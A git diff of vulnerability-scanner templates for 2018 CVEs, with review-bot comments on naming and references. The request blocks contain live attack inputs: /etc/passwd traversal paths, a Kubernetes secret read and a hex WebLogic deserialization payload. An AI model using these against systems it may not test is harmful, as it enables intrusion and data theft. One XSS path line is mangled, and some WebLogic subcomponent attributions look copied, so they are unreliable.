+++ b/cves/2018/CVE-2018-18264.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-18264 + +info: + name: Kubernetes Dashboard unauthenticated secret access + author: edoardottt + severity: high + description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3289 + - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ + - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-18264 + cwe-id: CWE-306 + metadata: + shodan-query: product:"Kubernetes" + tags: cve,cve2018,kubernetes,k8s,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - 'contains(body, "apiVersion") && contains(body, "objectRef")' \ No newline at end of file diff --git a/cves/2018/CVE-2018-18323.yaml b/cves/2018/CVE-2018-18323.yaml index e214ec632c..0161cdc19f 100644 --- a/cves/2018/CVE-2018-18323.yaml +++ b/cves/2018/CVE-2018-18323.yaml @@ -1,4 +1,5 @@ id: CVE-2018-18323 + info: name: Centos Web Panel 0.9.8.480 LFI author: 0x_Akoko @@ -8,6 +9,7 @@ info: - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html - http://centos-webpanel.com/ - https://www.cvedetails.com/cve/CVE-2018-18323 + - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 
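Review bot: The new file ends without a trailing newline (`\ No newline at end of file`), unlike the other templates added in this commit; add one. The dsl matcher requires `objectRef` in the body, which is not a field I would expect in a Secret object returned from `/api/v1/namespaces/.../secrets/...` (those carry `apiVersion`, `kind`, `metadata`, `data`), so unless it was checked against a live response the template may never match; a comment recording what the response looked like when it was tested would settle this. The name `Kubernetes Dashboard unauthenticated secret access` also departs from the `Product - Vulnerability` naming used by the other new templates here.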
diff --git a/cves/2018/CVE-2018-18570.yaml b/cves/2018/CVE-2018-18570.yaml index 51249a06a8..dc4cb72724 100644 --- a/cves/2018/CVE-2018-18570.yaml +++ b/cves/2018/CVE-2018-18570.yaml @@ -1,4 +1,5 @@ id: CVE-2018-18570 + info: name: Cross-Site Scripting on Planon web application author: emadshanab @@ -7,12 +8,12 @@ info: reference: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 - tags: xss,cve,cve2018,planon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-18570 cwe-id: CWE-79 + tags: xss,cve,cve2018,planon requests: - method: GET diff --git a/cves/2018/CVE-2018-18608.yaml b/cves/2018/CVE-2018-18608.yaml new file mode 100644 index 0000000000..945f316407 --- /dev/null +++ b/cves/2018/CVE-2018-18608.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-18608 + +info: + name: DedeCMS V5.7 - Cross Site Scripting + author: ritikchaddha + severity: medium + description: | + DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + reference: + - https://github.com/ky-j/dedecms/issues/8 + - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 + - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18608 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"DedeCms" + verified: "true" + tags: dedecms,xss,cve,cve2018 + +requests: + - method: GET + path: + - "{{BaseURL}}/plus/feedback.php/rp4hu%27>")' + +# Enhanced by mp on 2022/05/13 
diff --git a/cves/2018/CVE-2018-19326.yaml b/cves/2018/CVE-2018-19326.yaml new file mode 100644 index 0000000000..3011969d59 --- /dev/null +++ b/cves/2018/CVE-2018-19326.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-19326 + +info: + name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal + author: 0x_Akoko + severity: high + description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files. + reference: + - https://www.exploit-db.com/exploits/45904 + - https://www.cybersecurity-help.cz/vdb/SB2018120309 + - https://www.zyxel.com/homepage.shtml + - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-19326 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"VMG1312-B10D" + verified: true + tags: cve,cve2018,zyxel,lfi,modem,router + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" diff --git a/cves/2018/CVE-2018-19365.yaml b/cves/2018/CVE-2018-19365.yaml new file mode 100644 index 0000000000..b27127cfd2 --- /dev/null +++ b/cves/2018/CVE-2018-19365.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2018-19365 + +info: + name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal + author: 0x_Akoko + severity: high + description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + reference: + - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html + - https://www.cvedetails.com/cve/CVE-2018-19365 + - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-19365 + cwe-id: CWE-22 + tags: cve,cve2018,wowza,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index 1d426ddfe2..d4d33eccb1 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml 
@@ -4,14 +4,17 @@ info: name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting author: pikpikcu severity: medium - reference: https://www.cvedetails.com/cve/CVE-2018-19386/ - tags: cve,cve2018,solarwinds,xss + description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. + reference: + - https://www.cvedetails.com/cve/CVE-2018-19386/ + - https://i.imgur.com/Y7t2AD6.png + - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-19386 cwe-id: CWE-79 - description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." + tags: cve,cve2018,solarwinds,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml index ba2f295d30..d95e49bf11 100644 --- a/cves/2018/CVE-2018-19439.yaml +++ b/cves/2018/CVE-2018-19439.yaml 
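Review bot: The added `https://i.imgur.com/Y7t2AD6.png` reference is a screenshot on an image host, not a durable source; the NVD entry `https://nvd.nist.gov/vuln/detail/CVE-2018-19386` is the addition the other hunks in this commit make and would be the expected one here. The context line `name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting` still carries a stray space in the version while the new description correctly says `11.1.457`; since the commit rewrites this block, fixing the name to `11.1.457` here would keep the two consistent.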
@@ -5,16 +5,16 @@ info: author: madrobot,dwisiswant0 severity: medium description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4) - tags: cve,cve2018,oracle,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-19439 - cwe-id: CWE-79 reference: - http://www.securityfocus.com/bid/106006 - http://seclists.org/fulldisclosure/2018/Nov/58 - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19439 + cwe-id: CWE-79 + tags: cve,cve2018,oracle,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml index 8bfc61e40a..1efd4f5fbc 100644 --- a/cves/2018/CVE-2018-19458.yaml +++ b/cves/2018/CVE-2018-19458.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45780 - https://www.cvedetails.com/cve/CVE-2018-19458 - tags: cve,cve2018,lfi + - https://www.exploit-db.com/exploits/45780/ + - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 + tags: cve,cve2018,lfi,proxy requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-19753.yaml b/cves/2018/CVE-2018-19753.yaml index 0af644b43a..1fc3ca7ca6 100644 --- a/cves/2018/CVE-2018-19753.yaml +++ b/cves/2018/CVE-2018-19753.yaml @@ -1,4 +1,5 @@ id: CVE-2018-19753 + info: name: Tarantella Enterprise Directory Traversal author: 0x_Akoko 
@@ -7,6 +8,8 @@ info: reference: - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - https://www.cvedetails.com/cve/CVE-2018-19753 + - http://seclists.org/fulldisclosure/2018/Nov/66 + - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index fa78623265..2d0cfd55cd 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -5,13 +5,16 @@ info: author: daffainfo severity: medium description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 - tags: cve,cve2018,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS + - https://wpvulndb.com/vulnerabilities/9196 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-20462 cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml index 15ee6fd76f..5d89cd2d44 100644 --- a/cves/2018/CVE-2018-20470.yaml +++ b/cves/2018/CVE-2018-20470.yaml 
@@ -8,12 +8,13 @@ info: reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://www.cvedetails.com/cve/CVE-2018-20470 - tags: cve,cve2018,lfi + - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET diff --git a/cves/2018/CVE-2018-20824.yaml b/cves/2018/CVE-2018-20824.yaml index 174487aad6..2e75d666fc 100644 --- a/cves/2018/CVE-2018-20824.yaml +++ b/cves/2018/CVE-2018-20824.yaml @@ -5,14 +5,14 @@ info: author: madrobot,dwisiswant0 severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter. - tags: cve,cve2018,atlassian,jira,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-20824 - cwe-id: CWE-79 reference: - https://jira.atlassian.com/browse/JRASERVER-69238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-20824 + cwe-id: CWE-79 + tags: cve,cve2018,atlassian,jira,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 9158d407cd..71ed01c5b8 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml 
@@ -1,19 +1,20 @@ id: CVE-2018-20985 info: - name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion + name: WordPress Payeezy Pay <=2.97 - Local File Inclusion author: daffainfo + severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://wordpress.org/plugins/wp-payeezy-pay/#developers - https://www.cvedetails.com/cve/CVE-2018-20985/ - severity: critical - tags: cve,cve2018,wordpress,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 + tags: cve,cve2018,wordpress,lfi,plugin requests: - method: POST @@ -34,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml index 448abf9d82..920686afb2 100644 --- a/cves/2018/CVE-2018-2392.yaml +++ b/cves/2018/CVE-2018-2392.yaml @@ -4,7 +4,6 @@ info: name: SAP Internet Graphics Server (IGS) XML External Entity author: _generic_human_ severity: high - tags: cve,cve2018,sap,igs,xxe,xmlchart description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. reference: 
@@ -15,9 +14,10 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-2392 cwe-id: CWE-611 + tags: cve,cve2018,sap,igs,xxe,xmlchart requests: - raw: diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 86e858609d..4fcb606989 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml 
@@ -1,17 +1,22 @@ id: CVE-2018-2628 info: - name: Oracle WebLogic Server Deserialization RCE + name: Oracle WebLogic Server Deserialization - Remote Code Execution author: milo2012 severity: critical - reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 - tags: cve,cve2018,oracle,weblogic,network + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + reference: + - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2628 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.securitytracker.com/id/1040696 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2628 cwe-id: CWE-502 - description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." + tags: cve,cve2018,oracle,weblogic,network,deserialization network: - inputs: 
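Review bot: The new description names the affected subcomponent as `(subcomponent: Web Services)`, while the removed description it replaces said `(subcomponent: WLS Core Components)`; the same substitution is made in the CVE-2018-2893 hunk, and `WLS - Web Services` is what this commit's CVE-2018-2894 description says about a different CVE. This looks like the subcomponent was copied across the three WebLogic templates; confirm against the cited Oracle advisory and NVD entries before changing a factual attribution. The rest of the description (versions, T3 vector) matches the removed text.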
@@ -21,10 +26,14 @@ network: read: 1024 - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff')}}" read: 1024 + host: - "{{Hostname}}" + read-size: 
1024 matchers: - type: regex regex: - "\\$Proxy[0-9]+" + +# Enhanced by mp on 2022/04/14 diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index 3b9ac98e97..0d0071f34e 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml 
@@ -1,20 +1,24 @@ id: CVE-2018-2791 info: - name: Oracle WebCenter Sites Multiple XSS + name: Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting author: madrobot,leovalcante severity: high - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.20 - cve-id: CVE-2018-2791 + description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP + to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while + the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access + to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. reference: - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://www.securitytracker.com/id/1040695 - http://www.securityfocus.com/bid/103800 - https://www.exploit-db.com/exploits/44752/ - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites + - https://nvd.nist.gov/vuln/detail/CVE-2018-2791 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.2 + cve-id: CVE-2018-2791 tags: cve,cve2018,oracle,xss,wcs requests: @@ -40,4 +44,6 @@ requests: words: - '' - 'Missing translation key' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/04/20 
diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index f87d6e3fa4..e7ba463a2a 100644 --- a/cves/2018/CVE-2018-2893.yaml +++ b/cves/2018/CVE-2018-2893.yaml 
@@ -1,19 +1,25 @@ id: CVE-2018-2893 info: - name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) + name: Oracle WebLogic Server - Remote Code Execution author: milo2012 severity: critical - tags: cve,cve2018,weblogic,network - reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + reference: + - https://www.anquanke.com/post/id/152164 + - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + - https://nvd.nist.gov/vuln/detail/CVE-2018-2893 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2893 - description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." + tags: cve,cve2018,weblogic,network,deserialization,rce,oracle network: - inputs: + - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" read: 1024 - data: "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" 
@@ -25,10 +31,14 @@ network: - data: "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" type: hex read: 1024 + host: - "{{Hostname}}" + matchers: - type: word part: raw words: - "StreamMessageImpl cannot be cast to weblogic" + +# Enhanced by mp on 2022/04/14 diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index c5c306ce1f..06c12a5593 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -1,18 +1,21 @@ id: CVE-2018-2894 info: - name: Oracle WebLogic RCE + name: Oracle WebLogic Server - Remote Code Execution author: geeknik,pdteam - description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. severity: critical - tags: cve,cve2018,oracle,weblogic,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-2894 + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. reference: - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2894 + - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-2894 + tags: cve,cve2018,oracle,weblogic,rce requests: - raw: @@ -90,3 +93,5 @@ requests: - type: word words: - "26ec00a3a03f6bfc5226fd121567bb58" # MD5 (CVE-2018-2894) + +# Enhanced by mp on 2022/05/13 
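Review bot: After the rename on the `+ name:` line, CVE-2018-2894 carries exactly the same name as CVE-2018-2893 in the previous file of this commit, `Oracle WebLogic Server - Remote Code Execution`, so the two templates are no longer distinguishable in scan output or template listings. The two descriptions already differ in the vector (HTTP here, T3 in CVE-2018-2893), so that is the natural discriminator, e.g. `name: Oracle WebLogic Server (Web Services, HTTP) - Remote Code Execution`. The `requests` block of this template is outside the hunk.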
diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index 45ba1789ea..ce3dce57f2 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml @@ -5,15 +5,15 @@ info: author: geeknik severity: medium description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 - tags: cve,cve2018,oracle,ebs,ssrf - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-3167 reference: - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html - http://www.securitytracker.com/id/1041897 - http://www.securityfocus.com/bid/105627 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-3167 + tags: cve,cve2018,oracle,ebs,ssrf,blind requests: - method: POST diff --git a/cves/2018/CVE-2018-3238.yaml b/cves/2018/CVE-2018-3238.yaml index 6ac30f80d6..e8738fc6b3 100644 --- a/cves/2018/CVE-2018-3238.yaml +++ b/cves/2018/CVE-2018-3238.yaml 
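Review bot: The `description` key still holds a bare URL (`description: https://medium.com/@x41x41x41/...`), which the reorder of `classification` and `tags` in this hunk leaves untouched; a URL belongs under `reference`, and the field should carry a sentence as every other template in this commit now does. Going only by the link title and the `oracle,ebs,ssrf,blind` tags, something like `description: Oracle E-Business Suite is susceptible to unauthenticated server-side request forgery.` would fit, with the medium.com link moved into the `reference` list — confirm the wording against the write-up. The template's `id` and `name` lines sit above this hunk.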
